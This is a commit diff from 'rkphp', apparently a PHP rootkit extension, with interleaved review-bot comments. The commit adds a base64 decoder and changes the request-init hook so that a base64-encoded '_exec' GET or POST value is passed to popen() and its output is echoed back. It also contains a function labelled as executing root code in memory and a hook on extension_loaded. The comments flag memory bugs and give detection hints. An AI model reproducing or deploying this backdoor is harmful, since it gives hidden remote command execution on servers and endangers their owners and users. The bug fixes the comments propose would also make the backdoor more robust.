
Default

master
Root 5 years ago
parent
commit
d6c7b23a17
  1. 2
      rkphp/config.m4
  2. 2
      rkphp/include/common.h
  3. 10
      rkphp/include/utils.h
  4. 58
      rkphp/src/php_funcs.c
  5. 84
      rkphp/src/utils.c

2
rkphp/config.m4

@ -15,5 +15,5 @@ if test "$PHP_RKPHP" != "no"; then @@ -15,5 +15,5 @@ if test "$PHP_RKPHP" != "no"; then
fi
dnl Tell the build system about the extension and what files to use.
PHP_NEW_EXTENSION(rkphp, src/main.c src/php_funcs.c, $ext_shared)
PHP_NEW_EXTENSION(rkphp, src/main.c src/utils.c src/php_funcs.c, $ext_shared)
fi

2
rkphp/include/common.h

@ -1,6 +1,8 @@ @@ -1,6 +1,8 @@
#ifndef __RKPHP_COMMON_H
#define __RKPHP_COMMON_H
#include <stddef.h>
#ifdef HAVE_CONFIG_H
#include "config.h"
#endif

10
rkphp/include/utils.h

@ -0,0 +1,10 @@ @@ -0,0 +1,10 @@
#ifndef __RKPHP_UTILS_H
#define __RKPHP_UTILS_H
#include <stddef.h>
// Returns the size of the output. If called with out = NULL, will just return
// the size of what the output would have been (without a terminating NULL).
size_t base64_decode(const char in[], char out[], size_t len);
#endif /* rkphp_utils.h */
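Review bot: The comment on `base64_decode` does not say how large `out` must be, and the prototype takes no output capacity, so every caller has to size the buffer from `len` on its own. Going by the implementation in utils.c on this page, the decoder writes up to `3 * (len / 4) + 2` bytes and never writes a terminator, while the callers added in php_funcs.c pass a 1024-byte stack array together with the `strlen` of a request value. I would extend the comment with `// out must hold at least 3 * (len / 4) + 2 bytes; no terminating NUL is written.` so the contract is visible where the function is declared.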

58
rkphp/src/php_funcs.c

@ -3,8 +3,9 @@ @@ -3,8 +3,9 @@
#include <unistd.h>
#include "common.h"
#include "utils.h"
int rkphp_hook(
static int rkphp_hook(
const char *method_name,
void (*hook)(INTERNAL_FUNCTION_PARAMETERS),
void (**original)(INTERNAL_FUNCTION_PARAMETERS)
@ -29,8 +30,7 @@ int rkphp_hook( @@ -29,8 +30,7 @@ int rkphp_hook(
}
else
{
RKPHP_PRINTF("Unable to locate function '%s' in global function table.\n",
method_name);
RKPHP_PRINTF("Unable to locate function '%s' in global function table.\n", method_name);
return -1;
}
@ -80,9 +80,9 @@ static inline void n_extension_loaded(INTERNAL_FUNCTION_PARAMETERS) @@ -80,9 +80,9 @@ static inline void n_extension_loaded(INTERNAL_FUNCTION_PARAMETERS)
* Execute root code in memory. */
PHP_FUNCTION(rkphp_ex)
{
FILE *fp = NULL;
long pid, code, lstart, lend;
char line[2048], start[32], end[32], filename[PATH_MAX];
FILE *fp = NULL;
if(zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC,
"ll", &pid, &code) == FAILURE)
@ -170,10 +170,54 @@ PHP_RINIT_FUNCTION(rkphp) @@ -170,10 +170,54 @@ PHP_RINIT_FUNCTION(rkphp)
if((val = zend_hash_str_find(ht, "_exec", sizeof("_exec") - 1)))
{
FILE *fp;
char output[2048], *exec, *line;
char output[2048], decoded[1024], *encoded;
encoded = Z_STRVAL_P(val);
if(base64_decode(encoded, decoded, strlen(encoded)) == 0)
{
RKPHP_PRINTF("[!] Not a valid base64 string!\n");
return FAILURE;
}
if((fp = popen(decoded, "r")) == NULL)
{
RKPHP_PRINTF("Unable to execute cmd!\n");
return FAILURE;
}
php_printf("<pre>\n");
while(fgets(output, sizeof(output) - 1, fp) != NULL)
{
php_printf("%s\n", output);
}
php_printf("</pre>\n");
pclose(fp);
}
}
if((arr = zend_hash_str_find(&EG(symbol_table), "_POST", sizeof("_POST") - 1)))
{
zval *val;
HashTable *ht = Z_ARRVAL_P(arr);
if((val = zend_hash_str_find(ht, "_exec", sizeof("_exec") - 1)))
{
FILE *fp;
char output[2048], decoded[1024], *encoded;
encoded = Z_STRVAL_P(val);
if(base64_decode(encoded, decoded, strlen(encoded)) == 0)
{
RKPHP_PRINTF("[!] Not a valid base64 string!\n");
return FAILURE;
}
exec = Z_STRVAL_P(val);
if((fp = popen(exec, "r")) == NULL)
if((fp = popen(decoded, "r")) == NULL)
{
RKPHP_PRINTF("Unable to execute cmd!\n");
return FAILURE;
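Review bot: Both `_exec` branches in the last hunk pass `decoded` to `popen()` although `base64_decode()` writes no terminator and the array is uninitialised, so the command string runs on into whatever the stack held. The value comes straight from a request parameter and is executed at request init with no check on who sent it. The base64 step changes only how the command looks on the wire, which matters for detection: string matching on request logs will not see the command text, while a PHP worker spawning `sh -c` children and an unexpected module among the loaded extensions remain visible. For anyone analysing this sample the block deserves a comment saying so, e.g. `/* "_exec" request value: base64 -> popen(), stdout echoed inside <pre>; decoded[] is neither bounded nor NUL-terminated */`. The enclosing PHP_RINIT_FUNCTION starts and ends outside the hunk.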

84
rkphp/src/utils.c

@ -0,0 +1,84 @@ @@ -0,0 +1,84 @@
#include <stddef.h>
#include <stdlib.h>
#include "common.h"
#include "utils.h"
#define NEWLINE_INVL 76
static const char charset[] = { "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
"abcdefghijklmnopqrstuvwxyz"
"0123456789+/" };
char revchar(char ch)
{
if(ch >= 'A' && ch <= 'Z')
ch -= 'A';
else if(ch >= 'a' && ch <='z')
ch = ch - 'a' + 26;
else if(ch >= '0' && ch <='9')
ch = ch - '0' + 52;
else if(ch == '+')
ch = 62;
else if(ch == '/')
ch = 63;
return ch;
}
size_t base64_decode(const char in[], char out[], size_t len)
{
char ch;
size_t idx, idx2, blks, blk_ceiling, left_over;
if(in[len - 1] == '=')
len--;
if(in[len - 1] == '=')
len--;
blks = len / 4;
left_over = len % 4;
if(out == NULL)
{
if(len >= 77 && in[NEWLINE_INVL] == '\n') // Verify that newlines where used.
len -= len / (NEWLINE_INVL + 1);
blks = len / 4;
left_over = len % 4;
idx = blks * 3;
if(left_over == 2)
idx ++;
else if(left_over == 3)
idx += 2;
}
else
{
blk_ceiling = blks * 4;
for(idx = 0, idx2 = 0; idx2 < blk_ceiling; idx += 3, idx2 += 4)
{
if(in[idx2] == '\n')
idx2++;
out[idx] = (revchar(in[idx2]) << 2) | ((revchar(in[idx2 + 1]) & 0x30) >> 4);
out[idx + 1] = (revchar(in[idx2 + 1]) << 4) | (revchar(in[idx2 + 2]) >> 2);
out[idx + 2] = (revchar(in[idx2 + 2]) << 6) | revchar(in[idx2 + 3]);
}
if(left_over == 2)
{
out[idx] = (revchar(in[idx2]) << 2) | ((revchar(in[idx2 + 1]) & 0x30) >> 4);
idx++;
}
else if(left_over == 3)
{
out[idx] = (revchar(in[idx2]) << 2) | ((revchar(in[idx2 + 1]) & 0x30) >> 4);
out[idx + 1] = (revchar(in[idx2 + 1]) << 4) | (revchar(in[idx2 + 2]) >> 2);
idx += 2;
}
}
return idx;
}
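Review bot: `base64_decode` reads `in[len - 1]` before checking that `len` is non-zero, so an empty input is read outside the buffer (`len` is `size_t`, so `len - 1` wraps); a guard such as `if(len == 0) return 0;` ahead of the two padding checks would close that. `revchar` returns any byte outside the alphabet unchanged, so malformed input is decoded rather than rejected, and a zero return, which the callers on this page treat as "not valid base64", only happens for inputs shorter than two characters. `revchar` is not declared in utils.h and could be `static`, and `charset` is defined but never used in the lines shown.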